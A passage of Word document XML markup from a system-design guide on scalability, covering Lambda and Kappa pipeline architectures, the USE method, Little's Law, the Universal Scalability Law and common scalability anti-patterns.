    <w:p w14:paraId="1DA097F1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Race conditions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Two instances simultaneously read "99 requests" (limit 100), both allow → actual: 101. Solved with Redis INCR (atomic) or Lua scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F1AC54" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="34628F44">
          <v:rect id="_x0000_i2302" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="366CD9B3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Data Pipeline Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E870F0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 Lambda Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5841508C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For systems that need both batch accuracy and real-time speed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBBEEE3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Three layers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C8671D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Batch layer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Processes ALL data periodically (e.g., every hour). Produces accurate, complete results. Slow but thorough.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1328858D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Speed layer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Processes only recent data in real-time. Produces approximate, incremental results. Fast but potentially incomplete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149826AD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="191"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serving layer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Merges batch results + speed layer results to answer queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C107405" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3FAE00" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Batch layer: scales with more MapReduce/Spark nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02E2BC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Speed layer: scales with more stream processing instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C10AA1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="192"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Each layer scales independently based on its specific bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1B580" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Kappa Architecture (Simplified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475CE8BC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The argument:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Why maintain two codebases (batch + streaming)? Just use streaming for everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52594A17" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>All data is a stream of events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C2D5F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>One processing pipeline handles both real-time and historical reprocessing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E56743" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>To recompute: replay the entire event stream through a new version of the processor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB72F56" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Same as stream processing. Add partitions and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019FC05A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="441EF4ED">
          <v:rect id="_x0000_i2303" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A2E275" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Scaling Bottleneck Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD69153" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.1 Identifying Bottlenecks — The USE Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191F4E6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>For every resource (CPU, memory, network, disk):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576CC391" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>tilization: What percentage is busy?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02976B5F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>aturation: How much work is queued/waiting?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FEC45A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>rrors: Any errors due to overload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF63F4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> CPU utilization is 30%, but disk I/O saturation (queue depth) is high. The bottleneck is disk, not CPU. Adding CPU won't help. Adding faster disks or caching will.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A3509" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.2 Little's Law — Fundamental Scalability Math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B818E13" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24342AFF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>L = λ × W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062460B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>L = average number of requests in the system (concurrency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5525B976" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>λ = average arrival rate (requests/second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2348B6D1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>W = average time each request spends in the system (latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A34B6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4FA37" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>If your system handles requests at 100ms average, and you have 50 worker threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FF07D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5399C373" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Maximum throughput = L / W = 50 / 0.1 = 500 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBFD06" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>To handle 2,000 RPS at 100ms latency, you need:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456BEC0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE090FB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>L = 2000 × 0.1 = 200 concurrent workers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6826E717" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C4B80" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Increase L (more workers/threads/instances).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366947CA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Decrease W (optimize latency — faster DB queries, caching, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF3E57F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Both are valid scaling strategies. Often reducing W is more cost-effective than increasing L.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB84687" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.3 The Universal Scalability Law (USL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A767998" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Beyond Amdahl's Law, the USL accounts for </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crosstalk</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (coordination overhead between nodes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2379CF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204DFE1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>C(N) = N / (1 + σ(N-1) + κ·N·(N-1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500D80DF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>N = number of nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3115C574" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>σ = contention (serialization fraction, like Amdahl's S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B44AFD6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>κ = coherency (crosstalk/coordination cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A5D2B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> With crosstalk (κ &gt; 0), throughput doesn't just plateau — it actually </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>decreases</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> after a certain number of nodes. Adding more nodes makes the system slower because coordination overhead exceeds the benefit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F74E57A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A distributed system with aggressive locking. Adding the 5th node increases throughput. Adding the 10th node keeps throughput the same. Adding the 15th node actually decreases throughput because lock contention dominates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229475A1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Takeaway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> You must minimize coordination between nodes for linear scalability. This is why shared-nothing architectures scale better than shared-state architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34716214" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="72A6FE0A">
          <v:rect id="_x0000_i2304" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCC62C4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. Scalability Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F600AC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Premature optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Sharding a database that holds 10GB of data. The complexity isn't worth it until you actually need it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4384AFE9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shared mutable state everywhere:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Global locks, shared databases, centralized coordination — all become bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D46EC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous chains:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Service A → B → C → D synchronously. Latency adds up. One slow service blocks everything. Throughput is limited by the weakest link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1976BE4D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+1 query problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Fetching a list of 100 items, then making 100 individual queries for related data. Doesn't scale — latency grows linearly with data size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F5F65" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unbounded data growth without archiving:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Tables grow forever. Query performance degrades. Index sizes exceed memory. Full table scans become impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB9435" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chatty protocols between services:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> 50 RPCs to render one page. Under load, the fan-out creates exponential work. Solution: batch APIs, BFF (Backend for Frontend) pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361B276" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not designing for the 99th percentile:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Your system handles average load fine. But traffic has spikes (diurnal patterns, flash sales, viral content). Design for peak, not average.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608206C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="0B6CAC96">
          <v:rect id="_x0000_i2305" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D0BAFC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>20. Real-World Scalability — How the Giants Do It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A210D0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
